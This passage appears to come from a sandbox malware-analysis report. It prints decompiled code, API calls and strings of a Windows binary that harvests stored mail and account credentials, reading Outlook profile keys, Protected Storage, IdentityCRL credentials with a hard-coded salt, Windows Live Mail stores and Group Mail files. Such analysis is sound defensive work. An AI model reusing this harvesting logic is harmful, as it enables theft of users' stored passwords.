                                                                                                                                                                  				_t139 =  *_t79;
                                                                                                                                                                  				if( *_t79 != 0) {
                                                                                                                                                                  					 *((intOrPtr*)(_t106 + 0xf34)) = 0xa;
                                                                                                                                                                  					E0040D9D8(_t106 + 0x1c8, _t104, _t139, _t79, 0);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t114 = _t106 + 0xc25;
                                                                                                                                                                  				_t140 =  *_t114;
                                                                                                                                                                  				if( *_t114 != 0) {
                                                                                                                                                                  					strcpy(_t106 + 0x52a, _t106 + 0xe2f);
                                                                                                                                                                  					 *((intOrPtr*)(_t106 + 0xf34)) = 0xb;
                                                                                                                                                                  					E0040D9D8(_t106 + 0x1c8, _t104, _t140, _t114, 0);
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_t106 + 0x640); // executed
                                                                                                                                                                  				E0040E057(_t140); // executed
                                                                                                                                                                  				E0040DEC3(_t106 + 0x640);
                                                                                                                                                                  				_t82 = E004113C4(_t106 + 0x870, _t106 + 0x870); // executed
                                                                                                                                                                  				return _t82;
                                                                                                                                                                  			}
                                                                                                                                                                  0x00403e42
                                                                                                                                                                  0x00403e45
                                                                                                                                                                  0x00403e55
                                                                                                                                                                  0x00403e65
                                                                                                                                                                  0x00403e6f
                                                                                                                                                                  0x00403e6f
                                                                                                                                                                  0x00403e7a
                                                                                                                                                                  0x00403e7b
                                                                                                                                                                  0x00403e81
                                                                                                                                                                  0x00403e8d
                                                                                                                                                                  0x00403e96

APIs
  • Part of subcall function 0040EF05: FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C36
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4B
• strcpy.MSVCRT(?,?), ref: 00403E55
Strings
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C91
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6F
• www.google.com:443/Please log in to your Google Account, xrefs: 00403CA5
• www.google.com/Please log in to your Google Account, xrefs: 00403C9B
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFC
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD7
• pstorec.dll, xrefs: 00403C31
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D43
• www.google.com/Please log in to your Gmail account, xrefs: 00403C87
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA5
• PStoreCreateInstance, xrefs: 00403C45
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3C
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProcstrcpy
• String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
• API String ID: 2884822230-317895162
• Opcode ID: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
• Instruction ID: c79aa312a60a802310c0dbcdda9968b0b76b201639e98401828b305836cf62c0
• Opcode Fuzzy Hash: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
• Instruction Fuzzy Hash: BE51C472604601BAD710AF72CC46FDABA6CAF01709F14017FF905B61C2EB7DAB548A99
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
E0040E057(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
	void* _v0;
	void* __esi;
	long _t34;
	long _t36;
	long _t40;
	void* _t64;
	void* _t68;
	int _t73;

	E00412360(0x102c, _t64);
	_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
	if(_t34 != 0) {
		L10:
		return _t34;
	}
	_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
	if(_t36 != 0) {
		L9:
		_t34 = RegCloseKey(_v0); // executed
		goto L10;
	}
	_a8 = 0x1000;
	_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
	_t81 = _t40;
	if(_t40 == 0) {
		_t63 = _a4 + 0xc;
		if(E004047AA(_a4 + 0xc, _t81) != 0) {
			_a20 = _a8;
			_a24 =  &_a40;
			_t73 = 0x40;
			_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
			_a28 = _t73;
			_a32 = _t68;
			if(E0040481B(_t63,  &_a20,  &_a28,  &_a12) != 0) {
				if(_a12 < 0x400) {
					memcpy( &_a40, _t68, _t73);
					memcpy( &_a104, _a16, _a12);
					E0040DD59(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
				}
				LocalFree(_a16);
			}
		}
	}
	RegCloseKey(_a4);
	goto L9;
}











Addresses: 0x0040e062 0x0040e088 0x0040e08c 0x0040e18e 0x0040e194 0x0040e194 0x0040e0a2 0x0040e0a6 0x0040e184 0x0040e188 0x00000000 0x0040e188 0x0040e0c5 0x0040e0cd 0x0040e0d3 0x0040e0d5 0x0040e0de 0x0040e0ea 0x0040e0f4 0x0040e0fe 0x0040e102 0x0040e112 0x0040e119 0x0040e11d 0x0040e128 0x0040e132 0x0040e13b 0x0040e150 0x0040e16b 0x0040e16b 0x0040e174 0x0040e174 0x0040e128 0x0040e0ea 0x0040e17e 0x00000000

APIs
• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E088
• RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E0A2
• RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E80,?), ref: 0040E0CD
• RegCloseKey.ADVAPI32(?,?,?,?,?,00403E80,?), ref: 0040E17E
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• memcpy.MSVCRT ref: 0040E13B
• memcpy.MSVCRT ref: 0040E150
  • Part of subcall function 0040DD59: RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
  • Part of subcall function 0040DD59: memset.MSVCRT ref: 0040DDA1
  • Part of subcall function 0040DD59: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
  • Part of subcall function 0040DD59: RegCloseKey.ADVAPI32(?), ref: 0040DEB6
• LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E80,?), ref: 0040E174
• RegCloseKey.KERNELBASE(?,?,?,?,?,00403E80,?), ref: 0040E188
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                  • API String ID: 2768085393-1693574875
                                                                                                                                                                  • Opcode ID: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
                                                                                                                                                                  • Instruction ID: a1b69f5673053fc040be98c60ebfc88e8990dfc0172556f981ec686efddd513d
                                                                                                                                                                  • Opcode Fuzzy Hash: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
                                                                                                                                                                  • Instruction Fuzzy Hash: 99313CB2504305AFD700DF51DC40E9BBBECEF88798F00493AFA94E2160D775DA598B6A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 82%
_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
	struct HINSTANCE__* _t33;
	intOrPtr* _t35;
	intOrPtr* _t36;
	void* _t39;
	void _t41;
	intOrPtr _t48;
	signed int _t50;
	int _t52;
	intOrPtr _t55;
	signed int _t56;
	signed int _t57;
	intOrPtr _t62;
	intOrPtr _t63;
	intOrPtr* _t65;
	intOrPtr* _t69;
	int _t70;
	void* _t71;
	intOrPtr _t79;

	_push(0x70);
	_push(0x4133e0);
	E00412308(__ebx, __edi, __esi);
	_t33 = GetModuleHandleA(0);
	if(_t33->i != 0x5a4d) {
		L4:
		 *(_t71 - 0x1c) = 0;
	} else {
		_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
		if( *_t65 != 0x4550) {
			goto L4;
		} else {
			_t56 =  *(_t65 + 0x18) & 0x0000ffff;
			if(_t56 == 0x10b) {
				__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
				if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
					goto L4;
				} else {
					_t57 = 0;
					__eflags =  *(_t65 + 0xe8);
					goto L9;
				}
			} else {
				if(_t56 == 0x20b) {
					__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
					if( *((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
						goto L4;
					} else {
						_t57 = 0;
						__eflags =  *(_t65 + 0xf8);
						L9:
						_t9 = __eflags != 0;
						__eflags = _t9;
						 *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
					}
				} else {
					goto L4;
				}
			}
		}
	}
	 *(_t71 - 4) = 0;
	__set_app_type(2);
	 *0x418b6c =  *0x418b6c | 0xffffffff;
	 *0x418b70 =  *0x418b70 | 0xffffffff;
	_t35 = __p__fmode();
	_t62 =  *0x417b8c; // 0x0
	 *_t35 = _t62;
	_t36 = __p__commode();
	_t63 =  *0x417b88; // 0x0
	 *_t36 = _t63;
	 *0x418b68 =  *_adjust_fdiv;
	_t39 = E00412304();
	_t79 =  *0x417000; // 0x1
	if(_t79 == 0) {
		__setusermatherr(E00412304);
		_pop(_t63);
	}
	E004122F2(_t39);
	_push(0x4133b4);
	_push(0x4133b0);
	L004122EC();
	_t41 =  *0x417b84; // 0x0
	 *(_t71 - 0x20) = _t41;
	 *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24,  *0x417b80, _t71 - 0x20);
	_push(0x4133ac);
	_push(0x413398); // executed
	L004122EC(); // executed
	_t69 =  *_acmdln;
	 *((intOrPtr*)(_t71 - 0x34)) = _t69;
	if( *_t69 != 0x22) {
		while(1) {
			__eflags =  *_t69 - 0x20;
			if(__eflags <= 0) {
				goto L17;
			}
			_t69 = _t69 + 1;
			 *((intOrPtr*)(_t71 - 0x34)) = _t69;
		}
	} else {
		do {
			_t69 = _t69 + 1;
			 *((intOrPtr*)(_t71 - 0x34)) = _t69;
			_t55 =  *_t69;
		} while (_t55 != 0 && _t55 != 0x22);
		if( *_t69 == 0x22) {
			L16:
			_t69 = _t69 + 1;
			 *((intOrPtr*)(_t71 - 0x34)) = _t69;
		}
	}
	L17:
	_t48 =  *_t69;
	if(_t48 != 0 && _t48 <= 0x20) {
		goto L16;
	}
	 *(_t71 - 0x4c) = 0;
	GetStartupInfoA(_t71 - 0x78);
	_t87 =  *(_t71 - 0x4c) & 0x00000001;
	if(( *(_t71 - 0x4c) & 0x00000001) == 0) {
		_t50 = 0xa;
	} else {
		_t50 =  *(_t71 - 0x48) & 0x0000ffff;
	}
	_t52 = E0040BB8D(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
	_t70 = _t52;
	 *(_t71 - 0x7c) = _t70;
	if( *(_t71 - 0x1c) == 0) {
		exit(_t70); // executed
	}
	__imp___cexit();
	 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
	return E00412341(_t70);
}
0x0041211a
0x0041211c
0x00412121
0x0041212f
0x00412136
0x00412157
0x00412157
0x00412138
0x0041213b
0x00412143
0x00000000
0x00412145
0x00412145
0x0041214e
0x0041216f
0x00412173
0x00000000
0x00412175
0x00412175
0x00412177
0x00000000
0x00412177
0x00412150
0x00412155
0x0041215c
0x00412163
0x00000000
0x00412165
0x00412165
0x00412167
0x0041217d
0x0041217d
0x0041217d
0x00412180
0x00412180
0x00000000
0x00000000
0x00000000
0x00412155
0x0041214e
0x00412143
                                                                                                                                                                  0x00412183
                                                                                                                                                                  0x00412188
                                                                                                                                                                  0x0041218f
                                                                                                                                                                  0x00412196
                                                                                                                                                                  0x0041219d
                                                                                                                                                                  0x004121a3
                                                                                                                                                                  0x004121a9
                                                                                                                                                                  0x004121ab
                                                                                                                                                                  0x004121b1
                                                                                                                                                                  0x004121b7
                                                                                                                                                                  0x004121c0
                                                                                                                                                                  0x004121c5
                                                                                                                                                                  0x004121ca
                                                                                                                                                                  0x004121d0
                                                                                                                                                                  0x004121d7
                                                                                                                                                                  0x004121dd
                                                                                                                                                                  0x004121dd
                                                                                                                                                                  0x004121de
                                                                                                                                                                  0x004121e3
                                                                                                                                                                  0x004121e8
                                                                                                                                                                  0x004121ed
                                                                                                                                                                  0x004121f2
                                                                                                                                                                  0x004121f7
                                                                                                                                                                  0x00412216
                                                                                                                                                                  0x00412219
                                                                                                                                                                  0x0041221e
                                                                                                                                                                  0x00412223
                                                                                                                                                                  0x00412230
                                                                                                                                                                  0x00412232
                                                                                                                                                                  0x00412238
                                                                                                                                                                  0x00412274
                                                                                                                                                                  0x00412274
                                                                                                                                                                  0x00412277
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412279
                                                                                                                                                                  0x0041227a
                                                                                                                                                                  0x0041227a
                                                                                                                                                                  0x0041223a
                                                                                                                                                                  0x0041223a
                                                                                                                                                                  0x0041223a
                                                                                                                                                                  0x0041223b
                                                                                                                                                                  0x0041223e
                                                                                                                                                                  0x00412240
                                                                                                                                                                  0x0041224b
                                                                                                                                                                  0x0041224d
                                                                                                                                                                  0x0041224d
                                                                                                                                                                  0x0041224e
                                                                                                                                                                  0x0041224e
                                                                                                                                                                  0x0041224b
                                                                                                                                                                  0x00412251
                                                                                                                                                                  0x00412251
                                                                                                                                                                  0x00412255
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041225b
                                                                                                                                                                  0x00412262
                                                                                                                                                                  0x00412268
                                                                                                                                                                  0x0041226c
                                                                                                                                                                  0x00412281
                                                                                                                                                                  0x0041226e
                                                                                                                                                                  0x0041226e
                                                                                                                                                                  0x0041226e
                                                                                                                                                                  0x00412289
                                                                                                                                                                  0x0041228e
                                                                                                                                                                  0x00412290
                                                                                                                                                                  0x00412296
                                                                                                                                                                  0x00412299
                                                                                                                                                                  0x00412299
                                                                                                                                                                  0x0041229f
                                                                                                                                                                  0x004122d4
                                                                                                                                                                  0x004122df

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3662548030-0
                                                                                                                                                                  • Opcode ID: d9ca54d925000c8541e90f8f0bbdefa6f9bdc4c7a3278ea723e4384f5ba1aea6
                                                                                                                                                                  • Instruction ID: c2e845550ef1ad64eb6aea8f75856b2ed0c0391cefdfa0dcc66b3553e8bd0076
                                                                                                                                                                  • Opcode Fuzzy Hash: d9ca54d925000c8541e90f8f0bbdefa6f9bdc4c7a3278ea723e4384f5ba1aea6
                                                                                                                                                                  • Instruction Fuzzy Hash: 46419070D04249EFCB209FA4D9496ED7BB4EB09315F2081BBE861D7291D7B859D2CB1C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E004113C4(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				void _v275;
                                                                                                                                                                  				char _v276;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				void _v539;
                                                                                                                                                                  				char _v540;
                                                                                                                                                                  				void _v795;
                                                                                                                                                                  				char _v796;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				int _t44;
                                                                                                                                                                  				char* _t46;
                                                                                                                                                                  				char* _t48;
                                                                                                                                                                  				char* _t61;
                                                                                                                                                                  				void* _t64;
                                                                                                                                                                  				intOrPtr _t65;
                                                                                                                                                                  				void* _t66;
                                                                                                                                                                  				signed int _t68;
                                                                                                                                                                  				void* _t74;
                                                                                                                                                                  				void* _t75;
                                                                                                                                                                  				void* _t78;
                                                                                                                                                                  
                                                                                                                                                                  				// Decompiler output for the mail-store discovery routine. The comments are an
                                                                                                                                                                  				// analyst's reading of this listing; helper names (E0040F4CA, E004112EC, ...) are
                                                                                                                                                                  				// exactly as the decompiler emitted them and their roles below are inferred.
                                                                                                                                                                  				_t75 = __eflags;
                                                                                                                                                                  				_v796 = 0;
                                                                                                                                                                  				memset( &_v795, 0, 0x104); // MAX_PATH-sized path buffer
                                                                                                                                                                  				_t64 = 0x1c; // 0x1c is CSIDL_LOCAL_APPDATA; E0040F4CA is most likely a special-folder lookup (inferred)
                                                                                                                                                                  				_t61 =  &_v796;
                                                                                                                                                                  				 *((intOrPtr*)(_a4 + 4)) = 1; // client type 1: Windows Mail
                                                                                                                                                                  				E0040F4CA( &_v796, _t64); // executed
                                                                                                                                                                  				E00406763( &_v796, "\\Microsoft\\Windows Mail"); // append the store sub-path
                                                                                                                                                                  				_t65 = _a4;
                                                                                                                                                                  				E004112EC(_t65, _t75, _t61); // executed: process the Windows Mail store directory
                                                                                                                                                                  				 *((intOrPtr*)(_t65 + 4)) = 2; // client type 2: Windows Live Mail
                                                                                                                                                                  				_t66 = 0x1c;
                                                                                                                                                                  				E0040F4CA(_t61, _t66);
                                                                                                                                                                  				E00406763(_t61, "\\Microsoft\\Windows Live Mail");
                                                                                                                                                                  				E004112EC(_a4, _t75, _t61); // executed: process the default Windows Live Mail store directory
                                                                                                                                                                  				_v276 = 0;
                                                                                                                                                                  				memset( &_v275, 0, 0x104);
                                                                                                                                                                  				_v540 = 0;
                                                                                                                                                                  				memset( &_v539, 0, 0x104);
                                                                                                                                                                  				// 0x80000001 is HKEY_CURRENT_USER: read the user-configured "Store Root" of Windows Live Mail
                                                                                                                                                                  				E0040F232(_a4, 0x80000001, "Software\\Microsoft\\Windows Live Mail", "Store Root",  &_v276, 0x104); // executed
                                                                                                                                                                  				_t74 = (_t68 & 0xfffffff8) - 0x31c + 0x38; // decompiler artefact: aligned stack-frame base
                                                                                                                                                                  				ExpandEnvironmentStringsA( &_v276,  &_v540, 0x104); // resolve %USERPROFILE% and similar variables
                                                                                                                                                                  				_t44 = strlen( &_v540);
                                                                                                                                                                  				if(_t44 > 0) {
                                                                                                                                                                  					_t48 = _t74 + _t44 + 0x117; // last character of the expanded path
                                                                                                                                                                  					if( *_t48 == 0x5c) { // strip a trailing backslash
                                                                                                                                                                  						 *_t48 = 0;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_push( &_v532);
                                                                                                                                                                  				_t46 =  &_v796;
                                                                                                                                                                  				_push(_t46);
                                                                                                                                                                  				L00412072(); // helper taking both paths; a non-zero result selects the path in _v532 (inferred from the branch below)
                                                                                                                                                                  				_t78 = _t46;
                                                                                                                                                                  				if(_t46 != 0) {
                                                                                                                                                                  					_t46 = E004112EC(_a4, _t78,  &_v532); // executed: process the custom store root
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t46;
                                                                                                                                                                  			}
                                                                                                                                                                  0x004113c4
                                                                                                                                                                  0x004113e0
                                                                                                                                                                  0x004113e5
                                                                                                                                                                  0x004113f2
                                                                                                                                                                  0x004113f3
                                                                                                                                                                  0x004113f7

APIs
• memset.MSVCRT ref: 004113E5
  • Part of subcall function 00406763: strlen.MSVCRT ref: 00406765
  • Part of subcall function 00406763: strlen.MSVCRT ref: 00406770
  • Part of subcall function 00406763: strcat.MSVCRT(00000000,0041140D,0000001C,0041140D,\Microsoft\Windows Mail,?,?,?), ref: 00406787
  • Part of subcall function 0040F4CA: memset.MSVCRT ref: 0040F51F
  • Part of subcall function 0040F4CA: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040F588
  • Part of subcall function 0040F4CA: strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040F596
• memset.MSVCRT ref: 00411453
• memset.MSVCRT ref: 0041146E
  • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004114A7
• strlen.MSVCRT ref: 004114B5
• _stricmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?,?), ref: 004114DB
Strings
• \Microsoft\Windows Live Mail, xrefs: 0041142A
• Software\Microsoft\Windows Live Mail, xrefs: 00411484
• Store Root, xrefs: 0041147F
• \Microsoft\Windows Mail, xrefs: 00411403
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$strlen$Close$EnvironmentExpandStrings_stricmpstrcatstrcpy
• String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
• API String ID: 4071991895-2578778931
• Opcode ID: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
• Instruction ID: e9664ad0f3b84b924b74ee59ba002f7e9f43dcf230935329a4dad2143823624c
• Opcode Fuzzy Hash: b40a09ed6084c6be5fd3c209054c2b05923c65405b3fd14be26e8a18b8bd9bbc
• Instruction Fuzzy Hash: 45317772504348ABD320EBA9DD46FCB7BDC9B88714F00442FF649D7182EA78D55487AA
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 76%
E0040378B(void* __ecx, void* __edi, void* __fp0, intOrPtr _a4) {
	char _v276;
	char _v404;
	intOrPtr _v408;
	char _v792;
	intOrPtr _v796;
	char _v924;
	char _v936;
	void _v1959;
	char _v1960;
	void _v2983;
	char _v2984;
	void* __ebx;
	void* __esi;
	void* _t28;
	void* _t50;
	void* _t51;
	char* _t59;
	char* _t63;
	void* _t70;

	_t70 = __fp0;
	_t51 = __ecx;
	_v1960 = 0;
	memset( &_v1959, 0, 0x3ff);
	_v2984 = 0;
	memset( &_v2983, 0, 0x3ff);
	_t28 = E00411622(_t51,  &_v2984,  &_v1960); // executed
	if(_t28 == 0) {
		return _t28;
	}
	E00402197( &_v936);
	_push( &_v1960);
	_t50 = 0x7f;
	E004060DA(_t50,  &_v276);
	_t59 =  &_v404;
	E004060DA(_t50, _t59,  &_v2984);
	_v796 = 9;
	_v408 = 3;
	_t63 = strchr(_t59, 0x40);
	_push( &_v404);
	if(_t63 == 0) {
		if(strlen() + 0xa < 0) {
			sprintf( &_v792, "%s@yahoo.com",  &_v404);
		}
	} else {
		strcpy( &_v792, ??);
		 *_t63 = 0;
	}
	strcpy( &_v924,  &_v404);
	return E004023C6( &_v936, _t70, _a4);
}

APIs
• memset.MSVCRT ref: 004037AC
• memset.MSVCRT ref: 004037C0
  • Part of subcall function 00411622: memset.MSVCRT ref: 00411644
  • Part of subcall function 00411622: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004116B0
  • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
  • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
• strchr.MSVCRT ref: 0040382F
• strcpy.MSVCRT(?,?,?,?,?), ref: 0040384C
• strlen.MSVCRT ref: 00403858
• sprintf.MSVCRT ref: 00403878
• strcpy.MSVCRT(?,?,?,?,?), ref: 0040388E
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$strcpystrlen$Closememcpysprintfstrchr
• String ID: %s@yahoo.com
• API String ID: 1649821605-3288273942
• Opcode ID: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
• Instruction ID: fac56a1422f5c84d721e9c9d17906f33e473bda0e694fa5a8ecc328811f6b8f6
• Opcode Fuzzy Hash: 28c71e32e2af50959a8f735d191157fb7031000e76f71a7bd421d4c80fd3058b
• Instruction Fuzzy Hash: 952186B3D0012C6EDB21EA54DD41BDA77AC9F45348F0401EBF649F6181E6B8AF848F69
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
E004034A5(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
	void _v267;
	char _v268;
	void _v531;
	char _v532;
	void* __edi;
	void* __esi;
	void* _t15;
	void* _t23;
	char* _t28;

	_t23 = __ecx;
	_v532 = 0;
	memset( &_v531, 0, 0x104);
	_v268 = 0;
	memset( &_v267, 0, 0x104);
	_t15 = E0040F232(_t23, 0x80000002, "Software\\Group Mail", "InstallPath",  &_v532, 0xfa); // executed
	if(_t15 != 0) {
		strcpy( &_v268,  &_v532);
		_t28 =  &_v268;
		E00405F29(_t28);
		strcat(_t28, "fb.dat");
		return E004033B1(_t28, __fp0, _a4);
	}
	return _t15;
}

Instruction addresses: 0x004034a5, 0x004034be, 0x004034c5, 0x004034d4, 0x004034db, 0x004034fb, 0x00403505, 0x00403516, 0x0040351b, 0x00403521, 0x0040352e, 0x00000000, 0x00403540, 0x00403543

APIs
• memset.MSVCRT ref: 004034C5
• memset.MSVCRT ref: 004034DB
  • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
• strcpy.MSVCRT(00000000,00000000), ref: 00403516
  • Part of subcall function 00405F29: strlen.MSVCRT ref: 00405F2A
  • Part of subcall function 00405F29: strcat.MSVCRT(00000000,00414078,004062C9,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 00405F41
• strcat.MSVCRT(00000000,fb.dat,00000000,00000000), ref: 0040352E
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memsetstrcat$Closestrcpystrlen
• String ID: InstallPath$Software\Group Mail$fb.dat
• API String ID: 1387626053-966475738
• Opcode ID: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
• Instruction ID: 36ed55b5d374e154850240320204e9d1b3c473ccad1168af83c786b56a3c059d
• Opcode Fuzzy Hash: 38ec8536de8e14aff3b9b3d106331788fa2226ffb78b3e274a34b9b5a513c2d5
• Instruction Fuzzy Hash: 8201D8B294012879D720E655DD46FCA7A6C5F34745F0000E6BA48F21C2DAFCABD58B69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
E0040B91E(intOrPtr __eax, intOrPtr* __ebx) {
	struct HICON__* _v8;
	void _v263;
	char _v264;
	void* __edi;
	void* __esi;
	intOrPtr _t21;
	intOrPtr _t22;
	void* _t23;
	void* _t24;
	struct HICON__* _t28;
	intOrPtr* _t35;
	void* _t37;

	_t35 = __ebx;
	_t21 = __eax;
	 *((intOrPtr*)(__ebx + 0x124)) = 0;
	 *__ebx = 0x41457c;
	 *((intOrPtr*)(__ebx + 0x258)) = 0;
	_push(0x14);
	 *((intOrPtr*)(__ebx + 0x374)) = 0;
	L00412090();
	if(__eax == 0) {
		_t21 = 0;
		__eflags = 0;
	} else {
		 *0x418114 = __eax;
	}
	 *((intOrPtr*)(_t35 + 0x36c)) = _t21;
	L00412090(); // executed
	_t49 = _t21;
	_t37 = 0xf38;
	if(_t21 == 0) {
		_t22 = 0;
		__eflags = 0;
	} else {
		_t22 = E00404026(_t21, _t49);
	}
	 *((intOrPtr*)(_t35 + 0x370)) = _t22;
	 *((intOrPtr*)(_t35 + 0x378)) = 0;
	 *((intOrPtr*)(_t35 + 0x260)) = 0;
	 *((intOrPtr*)(_t35 + 0x25c)) = 0;
	 *((intOrPtr*)(_t35 + 0x154)) = 0;
	_t23 =  *(_t35 + 0x258);
	if(_t23 != 0) {
		DeleteObject(_t23);
